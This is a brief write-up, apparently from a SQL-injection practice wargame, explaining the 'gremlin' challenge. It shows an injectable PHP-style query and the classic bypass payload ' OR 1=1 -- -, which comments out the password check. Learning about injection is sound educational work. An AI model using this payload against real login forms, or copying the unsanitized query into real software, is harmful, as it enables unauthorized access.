gremlin

We are provided with the SQL query:

SELECT id FROM prob_gremlin WHERE id='{$_GET[id]}' AND pw='{$_GET[pw]}'

In order to make the result of this query True, we can provide the following URI parameter:

?id=' OR 1=1 -- -

The resultant query then becomes:

SELECT id FROM prob_gremlin WHERE id='' OR 1=1 -- -' AND pw=''

## Queried part:
SELECT id FROM prob_gremlin WHERE id='' OR 1=1

## Commented part:
AND pw=''

Since 1=1 is always true, the result of the OR operation will always be True.